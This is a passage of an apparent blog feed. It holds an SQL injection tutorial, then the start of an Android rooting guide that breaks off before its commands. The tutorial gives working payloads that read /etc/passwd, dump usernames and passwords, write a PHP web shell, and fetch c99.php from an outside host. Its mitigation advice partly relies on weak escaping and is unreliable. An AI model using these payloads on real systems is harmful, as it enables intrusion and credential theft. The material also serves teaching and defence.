&lt;div&gt;
By ordering by the integer 4, the SQL call is ordering by the 5th column called within the statement. Said statement may look like:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$news = mysql_query( &quot;SELECT title,date,time,author,body FROM `news` WHERE `id` = $id&quot; );&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The above query has 5 columns, which would result in the injection resulting as TRUE and ordering the columns by the author name. If the ORDER BY statement was increased to 6 however, the page would return either an error, or another page such as a redirected or blank page. With that said, it is then apparent that the amount of columns called within the query is 5.&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The final call of the above SQL query would result in:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
SELECT title,date,time,author,body FROM `news` WHERE `id` = $id ORDER BY 5&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===LOAD_FILE()===&lt;/div&gt;
&lt;div&gt;
The LOAD_FILE() function within MySQL is used to read and return the contents of a file located within the MySQL server. The file being read by LOAD_FILE() must have read rights by all users on the server, not just the server daemon. In order for a LOAD_FILE() injection to be successful, the absolute path of the file must be used, the use of a relative path will fail. To obtain an absolute path, see the article on [[Full Path Disclosure]].&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
An LOAD_FILE() injection may look like:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT LOAD_FILE(&#39;/etc/passwd&#39;)/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
If successful, the injection will display the contents of the passwd file.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===INTO OUTFILE()===&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The OUTFILE() function within MySQL is often used to run a query, and dump the results into a file. An attacker could exploit this ability by including a PHP system call into an injection, and write the query into an outfile. In order for a OUTFILE() injection to be successful, the absolute path of the file must be used, the use of a relative path will fail. The directory also needs to be writable. To obtain an absolute path, see the article on [[Full Path Disclosure]].&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
An INTO OUTFILE() injection may look like:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT null,null,null,null,&#39;&amp;lt;?php system($_GET[&quot;command&quot;]); ?&amp;gt;&#39; INTO OUTFILE &#39;/var/www/victim.com/shell.php&#39;/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
If successful, it will then be possible to run system commands via the $_GET global. The following is an example of using wget to get a file:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;pre&amp;gt;&lt;/div&gt;
&lt;div&gt;
http://www.victim.com/shell.php?command=wget http://www.example.com/c99.php&lt;/div&gt;
&lt;div&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===INFORMATION_SCHEMA===&lt;/div&gt;
&lt;div&gt;
The MySQL INFORMATION_SCHEMA database (available from MySQL 5), is made up of table-like objects (aka, system views), that result in the exposure of metadata in a relational format. The execution of arbitrary injections via SELECT statements are thus possible to retrieve or to format said metadata. Metadata is only accessible to an attacker if the objects retrieved are accessible by the current user account. The INFORMATION_SCHEMA database is automatically created by the server upon MySQL installation, and the metadata within is maintained by the server.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The INFORMATION_SCHEMA database is made up of the following objects:&lt;/div&gt;
&lt;div&gt;
&amp;lt;pre&amp;gt;SCHEMATA&lt;/div&gt;
&lt;div&gt;
TABLES&lt;/div&gt;
&lt;div&gt;
COLUMNS&lt;/div&gt;
&lt;div&gt;
STATISTICS&lt;/div&gt;
&lt;div&gt;
USER_PRIVILEGES&lt;/div&gt;
&lt;div&gt;
SCHEMA_PRIVILEGES&lt;/div&gt;
&lt;div&gt;
TABLE_PRIVILEGES&lt;/div&gt;
&lt;div&gt;
COLUMN_PRIVILEGES&lt;/div&gt;
&lt;div&gt;
CHARACTER_SETS&lt;/div&gt;
&lt;div&gt;
COLLATIONS&lt;/div&gt;
&lt;div&gt;
COLLATION_CHARACTER_SET_APPLICABILITY&lt;/div&gt;
&lt;div&gt;
TABLE_CONSTRAINTS&lt;/div&gt;
&lt;div&gt;
KEY_COLUMN_USAGE&lt;/div&gt;
&lt;div&gt;
ROUTINES&lt;/div&gt;
&lt;div&gt;
VIEWS&lt;/div&gt;
&lt;div&gt;
TRIGGERS&lt;/div&gt;
&lt;div&gt;
PROFILING&lt;/div&gt;
&lt;div&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
An injection exploiting the INFORMATION_SCHEMA database may look like the following:&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
UNION ALL SELECT * FROM INFORMATION_SCHEMA.TABLES/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The above statement would result in the output of all database tables accessible by the current MySQL user.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
In the case that the above SELECT statement returns false, it is possible to extend the statement to circumvent any restrictions.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
An extended INFORMATION_SCHEMA statement may appear as follows:&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
SELECT table_name FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = &#39;db_name&#39; [AND table_name LIKE &#39;wild&#39;]&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
SHOW TABLES FROM db_name [LIKE &#39;wild&#39;]&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===Char()===&lt;/div&gt;
&lt;div&gt;
The Char() function interprets each value as an integer and returns a string based on given the characters by the code values of those integers. With Char(), NULL values are skipped. The function is used within Microsoft SQL Server, Sybase, and MySQL, while CHR() is used by RDBMSs.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
SQL&#39;s Char() function comes in handy when (for example) addslashes() for PHP is used as a precautionary measure within the SQL query. Using Char() removes the need of quotation marks within the injected query.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
An example of some PHP code vulnerable to an SQL injection using Char() would look similar to the following:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$uname = addslashes( $_GET[&#39;id&#39;] );&lt;/div&gt;
&lt;div&gt;
$query = &#39;SELECT username FROM users WHERE id = &#39; . $id;&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
While addslashes() has been used, the script fails properly sanitize the input as there is no trailing quotation mark. This could be exploited using the following SQL injection string to load the /etc/passwd file:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT LOAD_FILE(CHAR(34,47,101,116,99,47,112,97,115,115,119,100,34))/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
It could also be used to force the application to allow LIKE statements to search for users like %admin%, as follows:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT username,password,null,null FROM users WHERE username LIKE CHAR(34,37,97,100,109,105,110,37,34)/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The syntax of the Char() function changes slightly when dealing with Microsoft SQL Server. For instance, the example given above would translate to the following:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT username,password,null,null FROM users WHERE username LIKE&lt;/div&gt;
&lt;div&gt;
CHAR(34) + CHAR(37) + CHAR(97) + CHAR(100) + CHAR(109) + CHAR(105) + CHAR(110) + CHAR(37) + CHAR(34)/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===CAST()===&lt;/div&gt;
&lt;div&gt;
Occasionally it may be necessary to change the data type of the variables in an injection to execute it without type mismatch errors. From time to time dynamic pages may be encountered that will only display certain types of data (strings, integers, dates etc) in certain positions. The CAST function can be used to bypass this and to convert data so that it can be displayed. Take the following example:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT 1,2,3,4,5/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The column at position 3 may only be allowed to display a string. It may be necessary to either enclose the 3 in inverted commas or to use the CAST function like the following example:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT 1,2,CAST(3 as nvarchar),4,5/*&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
This would still display a 3, but the server would treat it as a string and not an integer. There are numerous data types you can convert to including int, nvarchar, datetime and sql_variant to name just a few.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===LIMIT===&lt;/div&gt;
&lt;div&gt;
The MySQL LIMIT function is extremely useful. Some web pages don&#39;t always display lists of information but rather one record from the database. When this is the case, it will be necessary to form an injection that can display one record from a data set but still enable the retrieval of all records. The LIMIT function has the following syntax:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
LIMIT 0,1&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
In the example above, LIMIT is given the parameters 0 and 1. The 0 represents the position within the data set and the 1 represents the number of records to retrieve. This example would retrieve the first record within the data set. The following would display the first 10 records:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
LIMIT 0,10&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
To demonstrate how this would be useful, take the following injection:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT username, password, 3, 4 FROM users LIMIT 0,1&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
On a page that returns a single record, this would return the first record in the users table. Incrementing the start position, the 0, would return the 2nd record, 3rd record and so on until the end of the data set is reached.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
On a Microsoft SQL Server there is no LIMIT function. However it is possible, albeit much more complex, to accomplish the same outcome with the use of the TOP command and a sub-query.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
To illustrate the use of this technique, consider the example above which would translate to the following:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;mysql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
NULL UNION ALL SELECT TOP 1 username, password, 3, 4 FROM users WHERE username NOT IN (SELECT TOP 0 username FROM users)&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
Now this is a complex query and the sub query is the key component here. Essentially it tells the database to return the first record that isn&#39;t found within the sub query. This only works effectively when there&#39;s a unique field to compare against, usually id or username fields.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The query above tells the database to retrieve, in this case, the first record from the users table. The TOP 0 in the sub query is essentially the same as the 0 in the LIMIT example provided earlier, and the TOP 1 in the main query would translate to the 1 in that same example. To return the next record simply increment the 0.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===Information Gathering Techniques===&lt;/div&gt;
&lt;div&gt;
There are a number of information gathering techniques within SQL. These can be used for reconnaissance purposes to gather any needed information about the victim site.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&#39;&#39;&#39;@@version&#39;&#39;&#39;&lt;/div&gt;
&lt;div&gt;
@@version is used within SQL Server to discover which version of the server is running. An injection may look something like:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;sql&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
;SELECT @@VERSION--&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The output of the above statement would look similar to the following:&lt;/div&gt;
&lt;div&gt;
&amp;lt;pre&amp;gt;&lt;/div&gt;
&lt;div&gt;
Microsoft SQL Server &amp;nbsp;7.00 - 7.00.623 (Intel X86)&lt;/div&gt;
&lt;div&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Nov 27 1998 22:20:07&lt;/div&gt;
&lt;div&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Copyright (c) 1988-1998 Microsoft Corporation&lt;/div&gt;
&lt;div&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; Desktop Edition on Windows NT 5.1 (Build 2600: )&lt;/div&gt;
&lt;div&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
==SQL Injection Mitigation==&lt;/div&gt;
&lt;div&gt;
There are a number of ways to prevent MySQL injections within PHP. The most common ways are using functions such as addslashes() and mysql_real_escape_string().&amp;nbsp;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===addslashes()===&lt;/div&gt;
&lt;div&gt;
addslashes() will return a string with a backslash before characters that need to be sanitized in database queries. These characters are single quotes (&#39; = \&#39;) double quotes (&quot; = \&quot;) and the nullbyte ( = \0).&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
addslashes() will only work if the query string is wrapped in quotes. A string such as the following would still be vulnerable to an SQL injection:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$id = addslashes( $_GET[&#39;id&#39;] );&lt;/div&gt;
&lt;div&gt;
$query = &#39;SELECT username FROM users WHERE id = &#39; . $id;&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
However, if the script looked something like the following, addslashes() would prevent an SQL injection:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$uname = addslashes( $_GET[&#39;id&#39;] );&lt;/div&gt;
&lt;div&gt;
$query = &#39;SELECT username FROM users WHERE id = &quot;&#39; . $uname . &#39;&quot;;&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===mysql_real_escape_string()===&lt;/div&gt;
&lt;div&gt;
mysql_real_escape_string() is a little bit more powerful than addslashes() as it calls MySQL&#39;s library function mysql_real_escape_string, which prepends backslashes to the following characters: \x00, \n, \r, \, &#39;, &quot; and \x1a.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
As with addslashes(), mysql_real_escape_string() will only work if the query string is wrapped in quotes. A string such as the following would still be vulnerable to an SQL injection:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$uname = mysql_real_escape_string( $_GET[&#39;id&#39;] );&lt;/div&gt;
&lt;div&gt;
$query = &#39;SELECT username FROM users WHERE id = &#39; . $uname;&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
However, if the script looked something like the following, mysql_real_escape_string() would prevent an SQL injection:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$uname = mysql_real_escape_string( $_GET[&#39;id&#39;] );&lt;/div&gt;
&lt;div&gt;
$query = &#39;SELECT username FROM users WHERE id = &quot;&#39; . $uname . &#39;&quot;;&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===is_numeric()===&lt;/div&gt;
&lt;div&gt;
PHP&#39;s is_numeric() function can be used to check if a query is numeric or not, and return TRUE or FALSE. This function can be used to prevent SQL injections where the $id integer is called. The following is an example of the use of is_numeric() to prevent SQL injection:&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$id = $_GET[&#39;id&#39;];&lt;/div&gt;
&lt;div&gt;
( is_numeric( $id ) ? TRUE : FALSE );&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===sprintf()===&lt;/div&gt;
&lt;div&gt;
sprintf() can be used with conversion specifications to ensure that the dynamic argument is treated the way it&#39;s suppose to be treated. For example, if a call for the users ID number were in the string, %d would be used to ensure the argument is treated as an integer, and presented as a (signed) decimal number. An example of this is as follows:&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$id = $_GET[&#39;id&#39;];&lt;/div&gt;
&lt;div&gt;
$query = sprintf(&quot;SELECT username FROM users WHERE id = &#39;%d&#39; &quot;, $id);&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
===htmlentities($var, ENT_QUOTES)===&lt;/div&gt;
&lt;div&gt;
htmlentities() in conjunction with the optional second &#39;&#39;quote_style&#39;&#39; &amp;nbsp;parameter, allows the use of &#39;&#39;ENT_QUOTES&#39;&#39;, which will convert both double and single quotes. This will work in the same sense as addslashes() and mysql_real_escape_string() in regards to quotation marks, however, instead of prepending a backslash, it will use the HTML entity of the quotation mark.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
In addition to using ENT_QUOTES within htmlentities(), a third parameter can be set which forces the use of a character set within conversion. This will help stop unpredicted results from using multibyte characters in character sets such as BIG5 and GPK.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
The following is an example of code which would help to prevent SQL injection in PHP.&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&amp;lt;source lang=&quot;php&quot;&amp;gt;&lt;/div&gt;
&lt;div&gt;
$id = $_GET[&#39;id&#39;];&lt;/div&gt;
&lt;div&gt;
$id = htmlentities( $id, ENT_QUOTES, &#39;UTF-8&#39; );&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
$query = &#39;SELECT username FROM users WHERE id = &quot;&#39; . $id . &#39;&quot;&#39;;&lt;/div&gt;
&lt;div&gt;
&amp;lt;/source&amp;gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
And thats called sql injection&lt;/div&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/720501904039702545/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/sql-injection.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/720501904039702545'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/720501904039702545'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/sql-injection.html' title='SQL injection'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-693623408257395225</id><published>2013-07-20T00:50:00.000-07:00</published><updated>2013-07-29T05:23:18.025-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Android"/><title type='text'>How To Root Any Android Manually </title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;font-size: x-large;&quot;&gt;How To Root Any Android Manually&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
Hello there I am more Of an android person I know a lot about android if you need help with it may it be hard or easy ask me. I will post a lot of stuff about starting from how to root it to creating apps and custom roms.&lt;br /&gt;
&lt;br /&gt;
So today I will show you how to root an android.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What is Root?&lt;/b&gt;&lt;br /&gt;
Well basically rooting an android phone gives you full control over your phone and allows you to tamper with it as much as you want.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Warning!&lt;/b&gt;&lt;br /&gt;
Rooting an android phone may and will void your warranty. We are not responsible for any damages that may happen to your phone even though this is a very safe and easy method as long as you follow whats written.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Whats so great about this method:&lt;/b&gt;&lt;br /&gt;
This method is relatively easy and allows you to root almost any android phone as long as its 1.5 or higher and does not have much risk and also does not require any software.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What will you need!&lt;/b&gt;&lt;br /&gt;
You wont need any software or any thing that is too big to download you will need the following:&lt;br /&gt;
&lt;br /&gt;
1.An Android phone that is 1.5 or higher.&lt;br /&gt;
2.A USB Cable.&lt;br /&gt;
3.A Computer.&lt;br /&gt;
4. Appropriate drivers for your device. You can find them in the CD that came with the phone or online from the manufacturers website or Google.&lt;br /&gt;
5.Android SDK/ADB from &lt;a href=&quot;http://adf.ly/STAcl&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;. (Its a high file probably 500 MB you can skip it and download the next file but if you want to develop android apps and stuff download it.)&lt;br /&gt;
6.Android SDK files you need from &amp;nbsp;&lt;a href=&quot;http://adf.ly/SY946&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt; (download it if you skipped no.5).&lt;br /&gt;
7.SuperSu files you need from &lt;a href=&quot;http://adf.ly/SY9Bm&quot; target=&quot;_blank&quot;&gt;here&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;b&gt;What you will do:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Part 1:&lt;/b&gt;&lt;br /&gt;
Just extract what you have downloaded and copy everything from &quot;SuperUserFiles&quot; to &quot;Android-SDK-tools&quot;.&lt;br /&gt;
&lt;br /&gt;
For those who have downloaded SDK just install it and use the file in no.5 i will explain SDK in the next post.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Part2:&lt;/b&gt;&lt;br /&gt;
Go to your android and put it into Android Debugging Mode and if you don&#39;t what that is then you should not be here.&lt;br /&gt;
&lt;br /&gt;
For GingerBread User&#39;s it is usually in&lt;br /&gt;
&lt;hr size=&quot;1&quot; style=&quot;background-color: #cccccc; color: #cccccc; font-family: verdana, geneva, lucida, &#39;lucida grande&#39;, arial, helvetica, sans-serif; font-size: 13px;&quot; /&gt;
&lt;div id=&quot;post_message_94616&quot; style=&quot;font-family: verdana, geneva, lucida, &#39;lucida grande&#39;, arial, helvetica, sans-serif; font-size: 13px;&quot;&gt;
Settings --&amp;gt; Applications --&amp;gt; Development --&amp;gt; USB Debugging&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot; style=&quot;font-family: verdana, geneva, lucida, &#39;lucida grande&#39;, arial, helvetica, sans-serif; font-size: 13px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot; style=&quot;font-family: verdana, geneva, lucida, &#39;lucida grande&#39;, arial, helvetica, sans-serif; font-size: 13px;&quot;&gt;
And For ICS And JellyBean it is in&lt;/div&gt;
&lt;hr size=&quot;1&quot; style=&quot;background-color: #cccccc; color: #cccccc; font-family: verdana, geneva, lucida, &#39;lucida grande&#39;, arial, helvetica, sans-serif; font-size: 13px;&quot; /&gt;
&lt;div id=&quot;post_message_94616&quot; style=&quot;font-family: verdana, geneva, lucida, &#39;lucida grande&#39;, arial, helvetica, sans-serif; font-size: 13px;&quot;&gt;
Settings --&amp;gt; Applications --&amp;gt; Seveloper Options --&amp;gt; USB Debugging&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot; style=&quot;font-family: verdana, geneva, lucida, &#39;lucida grande&#39;, arial, helvetica, sans-serif; font-size: 13px;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;b&gt;Part3:&lt;/b&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
Now go to &quot;SuperUserFiles&quot; folder and press Shift+Right Click then click on &quot;Open Command Prompt here.&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
&lt;b&gt;Part4:&lt;/b&gt;&lt;/div&gt;
&lt;div id=&quot;post_message_94616&quot;&gt;
Be sure to run these commands exactly as they are written. The commands with an &quot;$&quot; or &quot;#&quot; will only run after the &quot;adb shell&quot; command. After writing &quot;adb devices&quot; your device id should be shown.&lt;/div&gt;
